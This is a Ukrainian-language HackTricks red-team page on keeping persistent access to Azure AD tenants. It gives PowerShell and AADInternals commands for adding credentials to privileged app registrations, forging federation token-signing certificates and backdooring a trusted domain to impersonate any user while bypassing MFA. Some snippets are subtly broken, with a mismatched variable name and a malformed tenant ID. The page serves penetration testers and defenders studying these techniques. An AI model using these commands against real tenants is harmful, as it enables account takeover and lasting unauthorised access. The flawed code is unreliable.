Az - Persistence

Вивчайте та практикуйте взлом AWS: Школа взлому HackTricks для експертів червоних команд AWS (ARTE) Вивчайте та практикуйте взлом GCP: Школа взлому HackTricks для експертів червоних команд GCP (GRTE)

Підтримайте HackTricks

Перевірте плани підписки!
Приєднуйтесь до 💬 групи Discord або групи Telegram або слідкуйте за нами на Twitter 🐦 @hacktricks_live.
Поширюйте хакерські трюки, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на GitHub.

Незаконне надання згоди

За замовчуванням будь-який користувач може зареєструвати додаток у Azure AD. Таким чином, ви можете зареєструвати додаток (лише для цільового орендаря), який потребує високих дозволів з адміністративною згодою (затвердити його, якщо ви є адміністратором) - наприклад, відправка листів від імені користувача, управління ролями тощо. Це дозволить нам здійснювати атаки фішингу, які були б дуже плідними у випадку успіху.

Крім того, ви також можете прийняти цей додаток за допомогою свого користувача як спосіб збереження доступу до нього.

Додатки та службові облікові записи

З привілеями адміністратора додатків, GA або власної ролі з дозволами на оновлення мікрософт.directory/applications/credentials, ми можемо додати облікові дані (секрет або сертифікат) до існуючого додатка.

Можливо націлювати додаток з високими дозволами або додавати новий додаток з високими дозволами.

Цікавою роллю для додавання до додатка була б роль адміністратора привілейованої аутентифікації, оскільки вона дозволяє скидати пароль глобальних адміністраторів.

Ця техніка також дозволяє обійти багатофакторну аутентифікацію.

$passwd = ConvertTo-SecureString "J~Q~QMt_qe4uDzg53MDD_jrj_Q3P.changed" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential("311bf843-cc8b-459c-be24-6ed908458623", $passwd)
Connect-AzAccount -ServicePrincipal -Credential $credentials -Tenant e12984235-1035-452e-bd32-ab4d72639a

Для аутентифікації на основі сертифікатів

Connect-AzAccount -ServicePrincipal -Tenant <TenantId> -CertificateThumbprint <Thumbprint> -ApplicationId <ApplicationId>

Федерація - Сертифікат підпису токена

З привілеями DA на локальному AD, можливо створити та імпортувати нові сертифікати підпису токена та розшифрування токена, які мають дуже довгий термін дії. Це дозволить нам увійти як будь-який користувач, чиїм ImuutableID ми знаємо.

Виконайте наведену нижче команду як DA на серверах ADFS, щоб створити нові сертифікати (за замовчуванням пароль 'AADInternals'), додайте їх до ADFS, вимкніть автоматичне оновлення та перезапустіть службу:

New-AADIntADFSSelfSignedCertificates

Потім оновіть інформацію про сертифікати з Azure AD:

Update-AADIntADFSFederationSettings -Domain cyberranges.io

Федерація - Довірений домен

З правами GA на орендаря, можливо додати новий домен (його необхідно підтвердити), налаштувати його тип аутентифікації на Федеративний та налаштувати домен для довіри до певного сертифіката (any.sts у команді нижче) та випускача:

# Using AADInternals
ConvertTo-AADIntBackdoor -DomainName cyberranges.io

# Get ImmutableID of the user that we want to impersonate. Using Msol module
Get-MsolUser | select userPrincipalName,ImmutableID

# Access any cloud app as the user
Open-AADIntOffice365Portal -ImmutableID qIMPTm2Q3kimHgg4KQyveA== -Issuer "http://any.sts/B231A11F" -UseBuiltInCertificate -ByPassMFA$true

Посилання

https://aadinternalsbackdoor.azurewebsites.net/

Вивчайте та практикуйте хакінг AWS:Школа хакінгу HackTricks AWS Red Team Expert (ARTE) Вивчайте та практикуйте хакінг GCP: Школа хакінгу HackTricks GCP Red Team Expert (GRTE)

Підтримайте HackTricks

Перевірте плани підписки!
Приєднуйтесь до 💬 групи Discord або групи Telegram або слідкуйте за нами на Twitter 🐦 @hacktricks_live.
Поширюйте хакінг-трюки, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на GitHub.

PreviousAz - Primary Refresh Token (PRT)NextAz - Device Registration

Last updated 1 month ago